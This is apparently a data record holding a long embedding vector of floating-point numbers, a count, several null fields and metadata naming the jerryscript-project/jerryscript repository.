-0.02684779092669487, -0.010876456275582314, 0.015742434188723564, 0.010957678779959679, 0.003029237035661936, -0.02280142344534397, -0.01034481730312109, 0.006490431260317564, 0.0006788555183447897, 0.02003985270857811, -0.005393924657255411, -0.006652876269072294, 0.005438228137791157, -0.01717490702867508, -0.00845454353839159, -0.01906518079340458, -0.003566414350643754, -0.015742434188723564, 0.020881613716483116, -0.0049804276786744595, -0.0013217146042734385, -0.030022859573364258, 0.010581101290881634, -0.012368000112473965, 0.00942921545356512, 0.02544485218822956, 0.0036845565773546696, -0.005002579186111689, -0.02489844523370266, -0.03393631428480148, -0.020335206761956215, 0.026050331071019173, 0.00519825192168355, 0.003217526013031602, -0.023997612297534943, -0.0367421917617321, -0.011134891770780087, 0.01766224205493927, -0.000807611970230937, 0.001324483542703092, -0.013837392441928387, 0.013940766453742981, 0.01713060401380062, -0.007151288446038961, 0.017145371064543724, 0.028487011790275574, 0.00464446097612381, 0.008004127070307732, 0.015085267834365368, 0.01977403275668621, 0.00926677044481039, -0.021620003506541252, 0.00017675163690000772, -0.007649700623005629, -0.010115916840732098, 0.01589011214673519, 0.0010937373153865337, -0.0017712083645164967, -0.01267073955386877, 0.006855932995676994, 0.020556723698973656, -0.009325841441750526, -0.0007854602881707251, 0.010832153260707855, -0.012338465079665184, -0.0030975379049777985, -0.0006234764005057514, -0.01906518079340458, 0.006136004813015461, -0.021309880539774895, -0.01609686017036438, 0.003405814990401268, 0.013032549060881138, 0.016436519101262093, -0.014309960417449474, -0.00764231663197279, -0.01566859520971775, -0.004020522814244032, -0.032489076256752014, -0.006675028242170811, 0.0062356870621442795, 0.021428022533655167, 0.004341722000390291, 0.00004133242691750638, -0.025208568200469017, -0.00166045012883842, -0.014332112856209278, 0.003128919517621398, 0.0199807807803154, 0.002104406012222171, -0.02928447164595127, -0.015092652291059494, 0.021620003506541252, -0.02640475705265999, 0.006032630335539579, 0.01788375899195671, -0.007502022664994001, 0.014243505895137787, 0.002881559543311596, -0.007775226142257452, -0.0027357276994735003, -0.0251199621707201, 0.003697478212416172, 0.014236122369766235, 0.006464587524533272, -0.0065605780109763145, 0.005770502611994743, -0.006804245989769697, 0.003990987315773964, -0.0034242747351527214, 0.006483047269284725, 0.007073757704347372, 0.024868909269571304, 0.025622066110372543, 0.015092652291059494, 0.016554661095142365, 0.012781497091054916, 0.006501507014036179, 0.0009995928267017007, -0.013874311931431293, -0.003115997649729252, -0.015801504254341125, -0.012847952544689178, -0.00401313928887248, 0.009850096888840199, 0.010979830287396908, -0.001883812597952783, -0.008683444000780582, 0.0044487882405519485, -0.012641203589737415, 0.015196026302874088, 0.009754106402397156, 0.018607379868626595, 0.01023405883461237, -0.010042077861726284, 0.0038248503115028143, 0.0040352907963097095, -0.023790864273905754, -0.002527133096009493, -0.025090426206588745, -0.009096940979361534, 0.014442870393395424, 0.01949344575405121, -0.0029960095416754484, -0.008712979033589363, 0.010787849314510822, 0.008092733100056648, -0.0036882483400404453, 0.018031436949968338, 0.00778999412432313, 0.0012663354864344, 0.02528240717947483, -0.005925564095377922, 0.02089638262987137, -0.003917148802429438, -0.002844640053808689, -0.005382848903536797, -0.005932948086410761, 0.000021199814000283368, -0.021782448515295982, -0.01026359386742115, 0.01450194139033556, -0.0014518555253744125, -0.006003094837069511, -0.0005007194122299552, -0.017677010968327522, -0.002213318133726716, -0.003741781460121274, -0.0013964764075353742, 0.006567962002009153, 0.006863316986709833, 0.001113120000809431, 0.006187691818922758, 0.0023831475991755724, 0.01648082211613655, -0.008520998060703278, -0.019582051783800125, -0.029314005747437477, -0.012242474593222141, 0.011526238173246384, -0.0024902138393372297, -0.006346445530653, -0.00807796511799097, 0.004869669210165739, -0.008137036114931107, 0.02074870467185974, -0.014258273877203465, 0.015698131173849106, -0.0031381493899971247, 0.01902087591588497, 0.0030310829170048237, -0.011149659752845764, 0.025518691167235374, -0.014671770855784416, 0.009141243994235992, -0.03479284420609474, -0.006187691818922758, 0.014346879906952381, 0.009311073459684849, -0.01975926384329796, 0.008469311520457268, -0.00926677044481039, -0.005046882666647434, 0.018341559916734695, -0.010942910797894001, -0.02906295470893383, 0.0009262155508622527, 0.011031517758965492, -0.0069113122299313545, -0.006593805272132158, -0.029343541711568832, 0.01069185882806778, 0.03225279226899147, 0.013298369012773037, 0.028058746829628944, -0.019434373825788498, -0.00002484848846506793, 0.002183782635256648, 0.0021874746307730675, -0.033257000148296356, -0.01975926384329796, 0.006169232539832592, 0.0334932841360569, 0.00669717974960804, 0.0018145886715501547, -0.005231479648500681, 0.0002743573277257383, 0.0006128621171228588, -0.003682710463181138, 0.01272242609411478, -0.028501778841018677, 0.012973478063941002, -0.0024329887237399817, 0.007568477652966976, -0.008912343531847, 0.015299401246011257, -0.0008126883767545223, 0.003950376063585281, 0.0014213970862329006, -0.01320976298302412, 0.014191818423569202, -0.011755137704312801, -0.012715042568743229, 0.0026065099518746138, 0.0183563269674778, 0.01028574537485838, 0.010603252798318863, 0.01544707827270031, -0.0013927845284342766, -0.0003071232931688428, -0.008772050030529499, -0.025843583047389984, -0.005537910386919975, 0.026124170050024986, 0.04081809148192406, -0.008845889009535313, 0.011371176689863205, -0.0030901541467756033, 0.013852160423994064, -0.003261829260736704, -0.00004156317299930379, 0.0008546842145733535, 0.006985151208937168, -0.006313217803835869, 0.001991801895201206, 0.014922822825610638, 0.011984038166701794, 0.010034693405032158, 0.009731954894959927, 0.004278958775103092, 0.012434454634785652, -0.015816273167729378, 0.002109943889081478, -0.0077383071184158325, -0.011157043278217316, 0.0005791731528006494, -0.0069408477284014225, -0.012212938629090786, 0.00945136696100235, -0.005803730338811874, 0.00005056227746536024, -0.008875424973666668, 0.01528463326394558, -0.005674512125551701, 0.00299785565584898, 0.029343541711568832, 0.01150408573448658, 0.01531416829675436, -0.00985748041421175, 0.02219594456255436, 0.02658197097480297, 0.010588484816253185, -0.028856204822659492, -0.002713576192036271, -0.028930043801665306, -0.0025437469594180584, 0.025946956127882004, 0.0003221218066755682, -0.03845525160431862, 0.009104324504733086, 0.03553123399615288, -0.003108613658696413, -0.024942748248577118, -0.0013807857176288962, 0.022387925535440445, -0.005571138113737106, 0.00011941119737457484, -0.001804435858502984, 0.025252871215343475, -0.01461269985884428, 0.021531395614147186, -0.008122269064188004, -0.011806825175881386, 0.003843309823423624, 0.015565220266580582, 0.0034113528672605753, 0.009436599910259247, 0.0027984906919300556, -0.01217601913958788, -0.038218967616558075, -0.008461927063763142, 0.005094877444207668, -0.006756250746548176, 0.007583245635032654, 0.028989115729928017, 0.015432310290634632, -0.0010346663184463978, -0.011068437248468399, 0.0024145289789885283, -0.01474560983479023, -0.0029886257834732533, -0.018991341814398766, -0.010270978324115276, 0.001156500307843089, -0.0028372560627758503, 0.028132585808634758, 0.01755886897444725, 0.006250455044209957, -0.007132828701287508, -0.0067414832301437855, 0.017868991941213608, -0.0008689904352650046, 0.023362599313259125, 0.015491381287574768, 0.006062165834009647, -0.021944893524050713, -0.0004044982197228819, 0.008956647478044033, -0.008329017087817192, 0.0008417624048888683, -0.015845807269215584, -0.018016668036580086, 0.008757282048463821, -0.025666369125247, 0.0052425554022192955, 0.007775226142257452, -0.016495589166879654, -0.004290034528821707, -0.013194995000958443, -0.01707153208553791, -0.009207699447870255, 0.01131948921829462, 0.0024772919714450836, 0.009569508954882622, -0.011828976683318615, -0.00342242862097919, -0.0007005456718616188, -0.01658419519662857, -0.0003075847926083952, 0.011157043278217316, -0.01226462610065937, -0.016288841143250465, -0.020733937621116638, 0.01792806200683117, -0.00599571131169796, 0.02247653342783451, 0.017485029995441437, 0.016436519101262093, -0.020349975675344467, -0.0034408883657306433, -0.009133860468864441, 0.010270978324115276, -0.0021708610001951456, -0.017588403075933456, -0.00942921545356512, 0.018814127892255783, 0.005740967113524675, 0.009473518468439579, 0.009325841441750526, -0.018179114907979965, -0.0008246871875599027, 0.015033581294119358, -0.0005699432804249227, -0.0008219181909225881, 0.015011429786682129, 0.00410543754696846, 0.011976654641330242, -0.00041349732782691717, -0.025385782122612, -0.027733854949474335, 0.002213318133726716, -0.0010318973800167441, 0.013069468550384045, -0.002468062099069357, 0.0022686973679810762, 0.011083205230534077, -0.013482966460287571, -0.017736081033945084, 0.013290985487401485, -0.004585389979183674, -0.008151804096996784, -0.012500910088419914, -0.01191019918769598, 0.0044783237390220165, -0.007542633917182684, 0.019257161766290665, -0.029358308762311935, -0.0003595026792027056, 0.014154898934066296, 0.005427152384072542, -0.026316151022911072, 0.009237234480679035, 0.008594837039709091, -0.008831121027469635, -0.008890192024409771, -0.017352119088172913, -0.007974591106176376, -0.016111627221107483, 0.004046366550028324, 0.006859625224024057, 0.015816273167729378, -0.011651763692498207, -0.0008168417843990028, -0.01680571213364601, -0.023968076333403587, -0.0009428292396478355, -0.009303689934313297, -0.0007213128264993429, -0.016288841143250465, -0.021679073572158813, 0.022653745487332344, -0.030598802492022514, -0.02252083644270897, -0.02365795336663723, 0.008395472541451454, 0.017736081033945084, -0.005194560158997774, -0.005726199597120285, -0.015269865281879902, -0.029993323609232903, 0.0007190053584054112, 0.01515172328799963, -0.0014693922130391002, -0.00982794538140297, 0.0103965038433671, -0.012279393151402473, -0.0013697098474949598, 0.01884366385638714, -0.017263513058423996, -0.011688683182001114, 0.031041834503412247, 0.003961451817303896, -0.010470342822372913, 0.006874392740428448, -0.025740208104252815, -0.010426039807498455, 0.020512420684099197, -0.0035147271119058132, -0.01091337576508522, 0.0056855883449316025, -0.0001758286525728181, -0.029195863753557205, 0.000625783868599683, -0.0006783940480090678, 0.025430085137486458, 0.005194560158997774, 0.02912202477455139, 0.006331677548587322, 0.024322502315044403, 0.003451964119449258, 0.009096940979361534, -0.010625404305756092, -0.015210794284939766, -0.022018732503056526, -0.01965589076280594, 0.009761489927768707, -0.0004335722478572279, 0.0009783641435205936, 0.0035405708476901054, 0.01069185882806778, -0.010728778317570686, -0.013785704970359802, 0.008188723586499691, 0.016392214223742485, -0.031100904569029808, 0.014332112856209278, 0.01163699571043253, 0.002204088494181633, 0.00969503540545702, 0.011792057193815708, 0.009887016378343105, 0.004489399492740631, -0.020394278690218925, -0.0072952741757035255, 0.011541005223989487, -0.0251199621707201, -0.018947036936879158, -0.019212856888771057, 0.0037233219482004642, -0.01825295388698578, -0.00534592941403389, 0.0036144095938652754, 0.008373321034014225, 0.013379591517150402, -0.0012174173025414348, 0.026020795106887817, 0.005279474891722202, 0.005545294377952814, -0.0002780492650344968, 0.026508131995797157, 0.016023021191358566, -0.009872248396277428, -0.017248746007680893, 0.0018939654109999537, -0.0030310829170048237, 0.007723539136350155, -0.0009192931465804577, -0.0066491845063865185, 0.002001031767576933, -0.02176767960190773, -0.012109564617276192, 0.005571138113737106, 0.015609524212777615, 0.018193881958723068, -0.007605397142469883, -0.01557998824864626, 0.0017665934283286333, -0.006660260260105133, 0.014819448813796043, 0.016731873154640198, -0.00575204286724329, 0.013955534435808659, -0.014538860879838467, -0.007287890184670687, -0.0015783044509589672, -0.00345011823810637, 0.020217064768075943, 0.014221354387700558, -0.017957597970962524, 0.0272760558873415, -0.021354183554649353, 0.013815240934491158, -0.005297934170812368, -0.0009654423920437694, -0.011821593157947063, -0.00022405463096220046, -0.00299785565584898, -0.004873361438512802, -0.003012623405084014, -0.014457638375461102, -0.00012598746980074793, 0.019596818834543228, -0.01857784390449524, 0.0014675463316962123, 0.029520755633711815, -0.006113853305578232, 0.024558786302804947, -0.00743925990536809, 0.0038986890576779842, -0.0022834651172161102, 0.011253033764660358, 0.007900752127170563, -0.014332112856209278, 0.0017149063060060143, -0.019582051783800125, -0.013697098940610886, -0.004552162252366543, -0.012102180160582066, -0.007782610133290291, 0.0001998262741835788, -0.004825366195291281, -0.01652512513101101, 0.0034298126120120287, 0.007819529622793198, 0.024617858231067657, 0.0051502566784620285, -0.005859109107404947, 0.03544262796640396, 0.0010235904483124614, 0.011865896172821522, 0.003466731868684292, -0.004323262255638838, 0.010765697807073593, -0.001769362366758287, 0.002455140231177211, 0.003217526013031602, 0.004626001231372356, -0.008624373003840446, -0.0059477160684764385, -0.019301464781165123, 0.002541900845244527, -0.0180905070155859, 0.0009940549498423934, -0.03180975839495659, 0.0248541422188282, -0.02290479838848114, -0.0018884275341406465, -0.0045669302344322205, -0.0014712382107973099, 0.004784754477441311, 0.021900590509176254, -0.04353535920381546, 0.025385782122612, -0.015343704260885715, 0.0009216006146743894, 0.027128377929329872, 0.013542037457227707, -0.014996661804616451, -0.004603849723935127, 0.005002579186111689, -0.011001981794834137, 0.0028575619217008352, -0.020217064768075943, 0.000873143901117146, 0.007287890184670687, -0.014007221907377243, 0.00023743791098240763, -0.01485636830329895, -0.010138068348169327, -0.011814208701252937, 0.014184434898197651, 0.018991341814398766, -0.025961725041270256, 0.011659147217869759, 0.010337432846426964, -0.005478839389979839, 0.013903846964240074, -0.0009543665801174939, -0.01296609453856945, 0.01749979704618454, 0.00987963192164898, -0.005124413408339024, 0.00307169440202415, -0.01404414139688015, -0.002342536114156246, 0.00036134864785708487, -0.009680267423391342, -0.030657872557640076, -0.002881559543311596, 0.026212776079773903, -0.009946087375283241, -0.000011342621291987598, 0.007664468139410019, 0.016761409118771553, -0.016185466200113297, 0.03207557648420334, -0.01531416829675436, 0.023082010447978973, 0.0064682792872190475, -0.011851128190755844, -0.027202216908335686, -0.006187691818922758, 0.003741781460121274, -0.0006797785172238946, 0.0052388631738722324, -0.016229769214987755, -0.00307169440202415, -0.01107582077383995, -0.01158530917018652, -0.020113691687583923, 0.012301545590162277, -0.001899503287859261, -0.0028040288016200066, 0.00451155100017786, 0.015210794284939766, 0.0069740754552185535, 0.001784130115993321, -0.010891224257647991, -0.0037067080847918987, 0.015860576182603836, 0.021900590509176254, 0.008757282048463821, -0.005416076630353928, 0.006324294023215771, -0.008919727988541126, 0.014826832339167595, -0.014664387330412865, 0.024603091180324554, 0.01337220799177885, 0.003972528036683798, 0.008594837039709091, 0.005087493918836117, 0.0006188615225255489, 0.00017052149632945657, -0.026493363082408905, 0.003392893122509122, -0.010950295254588127, 0.008284714072942734, 0.008949263021349907, -0.0018570460379123688, -0.0012995629804208875, 0.008063198067247868, -0.01131948921829462, -0.014117979444563389, -0.0025086733512580395, -0.009311073459684849, 0.0069556157104671, -0.002002877648919821, -0.017839455977082253, 0.020807776600122452, -0.005992019083350897, 0.011408095248043537, -0.004984119441360235, -0.009569508954882622, 0.007974591106176376, 0.019419606775045395, -0.0012266471749171615, -0.021575698629021645, -0.0073543451726436615, 0.0031049218960106373, 0.010625404305756092, -0.0007665391312912107, -0.008831121027469635, -0.0091781634837389, -0.0044487882405519485, 0.0021930125076323748, 0.00834378506988287, 0.014531477354466915, -0.009347992949187756, 0.0024754460901021957, 0.0031547630205750465, 0.027733854949474335, -0.007129136938601732, 0.02792583592236042, 0.005117029417306185, -0.013453430496156216, -0.0021413255017250776, 0.007996742613613605, -0.001025436446070671, 0.015299401246011257, -0.011570541188120842, -0.002671118825674057, 0.008868040516972542, 0.008203491568565369, 0.024809839203953743, -0.0042457315139472485, 0.00818134006112814, -0.004234655760228634, -0.0091781634837389, -0.011031517758965492, 0.0011075821239501238, -0.018563076853752136, 0.016082091256976128, 0.007147596683353186, -0.004260499030351639, -0.009931319393217564, -0.0000878566424944438, 0.0013457122258841991, 0.021944893524050713, 0.007391264662146568, -0.008941879495978355, 0.0026821945793926716, -0.012183403596282005, 0.021309880539774895, 0.004592773970216513, 0.004142357036471367, 0.000436571950558573, -0.0029738580342382193, 0.01061802078038454, -0.030539730563759804, -0.012980862520635128, 0.016628500074148178, 0.0008763743680901825, 0.029934251680970192, 0.008934495970606804, 0.005216711666435003, -0.0030606186483055353, 0.020453348755836487, -0.009702418930828571, -0.0259321890771389, 0.007210359442979097, -0.009953470900654793, 0.01355680450797081, 0.0046592284925282, -0.008609605021774769, -0.009820560924708843, 0.005360697396099567, 0.01150408573448658, -0.0243077352643013, 0.022077802568674088, 0.00684485724195838, 0.008698211051523685, 0.002050872892141342, 0.021147433668375015, 0.011592692695558071, 0.008653908036649227, 0.010381735861301422, 0.0038617695681750774, -0.024809839203953743, 0.01690908707678318, 0.009200314991176128, -0.013386975973844528, 0.004614925477653742, 0.0029572441708296537, 0.006398132536560297, -0.016082091256976128, 0.004301110282540321, 0.007465103175491095, -0.017839455977082253, -0.012943943031132221, -0.019198089838027954, -0.0037805468309670687, 0.00014363955415319651, -0.0061433888040483, 0.028132585808634758, -0.002468062099069357, 0.0051797921769320965, 0.020881613716483116, -0.0105367973446846, 0.007753074634820223, -0.009229850955307484, -0.012168635614216328, 0.014981893822550774, 0.005231479648500681, -0.0039060728158801794, -0.0054419199004769325, -0.02284572646021843, -0.008173955604434013, -0.020674865692853928, 0.026006028056144714, 0.030185304582118988, 0.03234139829874039, 0.001514618517830968, -0.010750929825007915, -0.0007273122319020331, -0.005777886603027582, 0.01450194139033556, -0.01531416829675436, 0.006471971515566111, 0.0006447050836868584, 0.0048881289549171925, 0.0029240166768431664, 0.0037288598250597715, 0.030332982540130615, 0.003799006575718522, -0.004086977802217007, 0.012500910088419914, 0.008262562565505505, 0.007967207580804825, 0.027630481868982315, -0.01490805484354496, 0.02095545269548893, 0.011673915199935436, 0.0022613133769482374, 0.003976219799369574, -0.017824687063694, -0.011289953254163265, 0.006929771974682808, -0.012715042568743229, -0.011467166244983673, 0.009008334018290043, -0.03845525160431862, 0.016982926055788994, -0.005670820362865925, -0.008299482055008411, 0.013069468550384045, 0.006106469314545393, -0.002314846497029066, 0.003710400080308318, 0.004773678723722696, -0.007583245635032654, 0.018666449934244156, -0.007575861643999815, -0.023569347336888313, 0.006730407476425171, 0.015801504254341125, 0.0044450960122048855, 0.01792806200683117, -0.02020229771733284, 0.0112087307497859, 0.003223063889890909, 0.01217601913958788, -0.005777886603027582, -0.004559546243399382, -0.014568396843969822, 0.00636121304705739, -0.009547357447445393, 0.0049804276786744595, 0.014243505895137787, -0.0015109266387298703, 0.00821087509393692, -0.0020324131473898888, -0.0099903903901577, 0.0010494340676814318, 0.007339577190577984, -0.030539730563759804, -0.000005754235189669998, 0.001958574401214719, -0.01571289822459221, -0.0008316095336340368, -0.012257241643965244, -0.01463485136628151, -0.0008408394060097635, -0.008520998060703278, -0.006261530797928572, 0.0019567282870411873, -0.004607541486620903, 0.00782691314816475, -0.023480741307139397, 0.010042077861726284, -0.010307897813618183, -0.013194995000958443, 0.009864864870905876, -0.003165838774293661, 0.019951244816184044, -0.008351168595254421, 0.004315878264605999, -0.009731954894959927, -0.0064498200081288815, -0.0028667915612459183, 0.010632787831127644, -0.0002868176088668406, 0.0010291283251717687, -0.021413253620266914, 0.012899640016257763, 0.041940443217754364, -0.018430165946483612, -0.005578521639108658, -0.004803214222192764, 0.005663436371833086, -0.0061433888040483, -0.004016831051558256, 0.014125363901257515, 0.00861698854714632, -0.009820560924708843, -0.0033522818703204393, -0.020172761753201485, -0.008469311520457268, 0.00818134006112814, 0.021885821595788002, 0.020556723698973656, 0.026773951947689056, 0.005785270594060421, -0.0043860250152647495, -0.020453348755836487, 0.023968076333403587, 0.009820560924708843, 0.015535685233771801, -0.014250889420509338, -0.010558949783444405, 0.015122187323868275, 0.0099903903901577, 0.007465103175491095, 0.01599348522722721, -0.00499519519507885, -0.022668514400720596, -0.0025068274699151516, -0.00005941716517554596, 0.0032692132517695427, -0.011223498731851578, 0.013571572490036488, -0.001513695577159524, 0.02977180667221546, 0.015506149269640446, 0.011969270184636116, -0.0024717540945857763, 0.0017195212421938777, 0.02560729905962944, -0.0009811331983655691, -0.004282651003450155, 0.012035725638270378, -0.0037011702079325914, 0.0011814208701252937, -0.020733937621116638, -0.009148628450930119, 0.0030975379049777985, -0.018607379868626595, -0.04737497866153717, -0.026079867035150528, 0.013940766453742981, -0.0019271929049864411, 0.002030567266047001, -0.011651763692498207, 0.022875262424349785, 0.01745549403131008, 0.007007302716374397, -0.009495670907199383, -0.008365936577320099, 0.004578005988150835, -0.0006991612026467919, 0.01965589076280594, -0.021620003506541252, -0.017189674079418182, -0.021428022533655167, 0.003427966497838497, 0.003739935578778386, 0.010049461387097836, 0.007568477652966976, 0.0013660179683938622, -0.007143904455006123, -0.009480902925133705, -0.01906518079340458, -0.013438662514090538, 0.028235958889126778, -0.0023406902328133583, -0.002992317546159029, 0.012692891061306, -0.0002852024044841528, -0.029240166768431664, -0.00676732650026679, 0.0006774710491299629, 0.03003762662410736, 0.002423758851364255, -0.015048349276185036, -0.015476614236831665, 0.01902087591588497, -0.006556886248290539, -0.0030236991588026285, -0.0011740369955077767, -0.0001932500017574057, 0.015520917251706123, 0.010514645837247372, -0.014627467840909958, -0.007435567677021027, -0.0004308032803237438, -0.0008459158125333488, 0.003762087319046259, 0.010750929825007915, -0.019035644829273224, 0.008284714072942734, -0.0003749626921489835, 0.007280506193637848, -0.0011195809347555041, -0.007343269418925047, 0.016835248097777367, -0.0001252952206414193, 0.013645411469042301, -0.01792806200683117, 0.008838505484163761, -0.0044783237390220165, -0.002342536114156246, 0.0024717540945857763, 0.011607460677623749, 0.004574314225465059, 0.019419606775045395, -0.0229638684540987, -0.0025603605899959803, 0.002421912970021367, 0.012862720526754856, -0.013313136994838715, -0.018193881958723068, -0.004175584297627211, -0.012013574130833149, -0.007066373713314533, -0.00874989852309227, -0.007254662923514843, -0.023672722280025482, -0.020999757573008537, -0.005689280107617378, -0.0026231235824525356, 0.012892255559563637, 0.004267883021384478, 0.008365936577320099, 0.031189512461423874, 0.02204826846718788, 0.009074789471924305, 0.004290034528821707, -0.0019456525333225727, 0.010160219855606556, 0.00116480712313205, 0.0023997612297534943, -0.024824606254696846, -0.012707659043371677, 0.027911068871617317, 0.024027148261666298, 0.006855932995676994, 0.009311073459684849, 0.0061433888040483, -0.0009128322708420455, -0.006316910032182932, 0.01485636830329895, 0.015801504254341125, 0.01825295388698578, -0.0015312322648242116, 0.008218259550631046, -0.0028483320493251085, -0.009259385988116264, -0.010337432846426964, -0.021206505596637726, 0.005958791822195053, 0.013896463438868523, -0.005320086143910885, 0.047936152666807175, 0.022225480526685715, 0.0008768358384259045, 0.012715042568743229, 0.026389990001916885, -0.006102777551859617, 0.00953259039670229, 0.0025215952191501856, 0.016894318163394928, 0.012870104052126408, 0.010662323795258999, -0.004253115504980087, -0.021723376587033272, 0.017972365021705627, 0.003202758263796568, 0.012611668556928635, 0.006667644251137972, 0.020335206761956215, -0.03030344657599926, -0.000458723574411124, -0.0011454244377091527, 0.029358308762311935, 0.005829573608934879, 0.00012379536929074675, -0.005334853660315275, -0.022830959409475327, 0.009060021489858627, 0.04985596239566803, 0.0031326112803071737, 0.004873361438512802, -0.002730189822614193, 0.004038982558995485, 0.008779434487223625, -0.03408399224281311, 0.018976572901010513, 0.012353232130408287, 0.015210794284939766, 0.0074134161695837975, -0.005759426858276129, -0.0018976572901010513, 0.001805358799174428, -0.002349920105189085, -0.005464071873575449, 0.01323191449046135, -0.01307685300707817, -0.016938623040914536, -0.0012211092980578542, 0.005316393915563822, -0.0041571250185370445, 0.006996226962655783, -0.006693487986922264, 0.002955398289486766, 0.004079594276845455, -0.0009866710752248764, -0.00845454353839159, -0.0044561717659235, 0.0015912263188511133, -0.014561012387275696, 0.023318294435739517, -0.026493363082408905, 0.0047995224595069885, -0.008705595508217812, -0.005910796578973532, -0.020925918594002724, 0.0011389636201784015, 0.002962782047688961, 0.0028575619217008352, -0.03505866602063179, 0.004208812024444342, 0.0003507343353703618, 0.005124413408339024, 0.005290550645440817, -0.004648152738809586, -0.0014057062799111009, 0.0011251188116148114, 0.031573474407196045, -0.005046882666647434, -0.00299785565584898, -0.006014170590788126, -0.02128034457564354, 0.008137036114931107, -0.003259983379393816, 0.01658419519662857, -0.009244618937373161, 0.0016789098735898733, 0.03863246366381645, -0.0059477160684764385, 0.01320976298302412, 0.0297127366065979, 0.006737791001796722, 0.012759345583617687, 0.021516628563404083, -0.013431278988718987, -0.007716155145317316, 0.0025160573422908783, 0.0037085539661347866, -0.003049542661756277, 0.012375383637845516, -0.008018894121050835, -0.007885984145104885, 0.00043034180998802185, 0.010248826816678047, -0.014760377816855907, -0.025843583047389984, 0.012013574130833149, 0.007930288091301918, 0.019257161766290665, -0.0008902191184461117, -0.01285533607006073, 0.00863914005458355, 0.0045964657329022884, 0.01402198988944292, 0.007420800160616636, 0.0011325026862323284, 0.00807796511799097, -0.003660558955743909, 0.007140212692320347, -0.0010752775706350803, -0.01879936084151268, -0.03009669855237007, -0.0036568669602274895, 0.007804762106388807, 0.0017361349891871214, -0.013623259961605072, 0.010972446762025356, -0.0019899557810276747, -0.026803486049175262, 0.022786656394600868, 0.007538942154496908, 0.004518934991210699, 0.016997693106532097, -0.008269946090877056, 0.023997612297534943, 0.0058849528431892395, 0.0034981134813278913, 0.02231408655643463, -0.016702337190508842, -0.0008482232806272805, -0.021487092599272728, -0.006656568497419357, -0.007335885427892208, -0.013844775967299938, 0.00042757284245453775, -0.00160045619122684, -0.05192345008254051, 0.0012229552958160639, -0.003413198748603463, 0.0202466007322073, 0.006483047269284725, 0.0122867776080966, -0.0036494829691946507, 0.002394223352894187, -0.0073543451726436615, 0.008646524511277676, -0.002576974453404546, 0.002931400667876005, 0.000200287759071216, 0.0007037761388346553, 0.007568477652966976, 0.002067486522719264, -0.01034481730312109, 0.051657628268003464, 0.018710752949118614, -0.0002683579223230481, 0.019700193777680397, -0.0022890029940754175, 0.013874311931431293, 0.008070581592619419, -0.017219210043549538, -0.014346879906952381, 0.03030344657599926, 0.006571653764694929, 0.0019511905265972018, 0.017041996121406555, -0.015048349276185036, 0.002213318133726716, -0.012161251157522202, -0.018917502835392952, 0.000851453747600317, -0.025356246158480644, -0.025252871215343475, -0.004134973045438528, 0.007590629160404205, 0.012523061595857143, -0.015963949263095856, 0.0033375141210854053, 0.004806906450539827, -0.0038986890576779842, -0.005774194840341806, 0.008764666505157948, -0.020069386810064316, 0.012183403596282005, -0.012818416580557823, -0.006309526041150093, 0.011061053723096848, -0.0004462632932700217, -0.003223063889890909, 0.007974591106176376, 0.009104324504733086, -0.00956212542951107, -0.014959742315113544, -0.009259385988116264, 0.01599348522722721, -0.012515678070485592, -0.0014435487100854516, 0.019301464781165123, -0.01093552727252245, -0.0221516415476799, -0.0072325109504163265, 0.007520482409745455, -0.008439775556325912, 0.002307462738826871, 0.009170779958367348, 0.0038396180607378483, 0.014169666916131973, -0.0012044955510646105, -0.0036771725863218307, 0.005571138113737106, 0.0006193229928612709, -0.008432392030954361, -0.016082091256976128, -0.002859407803043723, -0.023805631324648857, -0.014767761342227459, 0.013903846964240074, -0.013327904976904392, -0.012589516118168831, 0.018932269886136055, 0.03154393658041954, -0.019242392852902412, 0.010366968810558319, 0.003667942713946104, 0.003106767777353525, -0.004555854480713606, 0.005873877089470625, -0.0213394146412611, -0.015535685233771801, 0.00586280133575201, -0.01896180585026741, -0.01631837710738182, -0.0011048131855204701, -0.017647475004196167, -0.0048585934564471245, -0.008425007574260235, 0.0007180824177339673, -0.001171268057078123, 0.004426636267453432, -0.01950821280479431, -0.01664326712489128, -0.01528463326394558, 0.023731792345643044, 0.0248393751680851, 0.016510358080267906, -0.002809566678479314, 0.00011525776062626392, 0.003391047241166234, -0.019242392852902412, -0.0063575212843716145, 0.011755137704312801, -0.004651844967156649, 0.014014605432748795, 0.008299482055008411, 0.020335206761956215, -0.026833022013306618, -0.0029720119200646877, -0.0038248503115028143, -0.01772131398320198, 0.007612781133502722, -0.006597497500479221, -0.00690023647621274, -0.012678123079240322, 0.02138371765613556, -0.0036993243265897036, -0.006346445530653, 0.004530010744929314, 0.0226832814514637, 0.004120205529034138, 0.0042161960154771805, 0.010115916840732098, 0.011644380167126656, -0.006110161077231169, -0.004171892534941435, -0.005205635912716389, 0.03851432353258133, 0.0018450472271069884, 0.012840568087995052, -0.009591661393642426, 0.011422863230109215, 0.008122269064188004, -0.004112821538001299, 0.01851877197623253, -1.9108675530787878e-7, -0.01658419519662857, 0.005419768393039703, 0.01571289822459221, -0.004958275705575943, 0.014007221907377243, -0.0024920597206801176, 0.010049461387097836, 0.0234955083578825, 0.00791552010923624, -0.025917422026395798, 0.04418514296412468, -0.00601047882810235, -0.005811114329844713, -0.004740451462566853, 0.011629612185060978, -0.015358472242951393, -0.013180227018892765, 0.00006184000085340813, -0.028723295778036118, 0.0199807807803154, 0.011984038166701794, 0.011105356737971306, 0.006394440773874521, 0.01436903141438961, 0.005072725936770439, 0.01918332278728485, 0.014597931876778603, -0.022136874496936798, 0.0024274508468806744, -0.006283682305365801, 0.0027984906919300556, -0.005929256323724985, 0.007723539136350155, 0.011245650239288807, 0.022653745487332344, -0.00872036349028349, -0.0038248503115028143, 0.018179114907979965, 0.010581101290881634, -0.008705595508217812, -0.006848549470305443, -0.005128105171024799, -0.00778999412432313, 0.007498330902308226, 0.017913294956088066, 0.0012451069196686149, -0.003887613071128726, 0.018755057826638222, 0.0065605780109763145, 0.01239753607660532, -0.003392893122509122, -0.0272760558873415, 0.01977403275668621, 0.02630138210952282, 0.005497299134731293, -0.01745549403131008, -0.03142579644918442, 0.016702337190508842, 0.0033799714874476194, -0.00016936776228249073, -0.022609442472457886, 0.018607379868626595, -0.014738226309418678, -0.020320439711213112, 0.02656720206141472, 0.030022859573364258, 0.0066491845063865185, 0.022830959409475327, -0.0036790184676647186, 0.0035627223551273346, -0.026877325028181076, -0.005619133356958628, 0.014782529324293137 ]
202
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
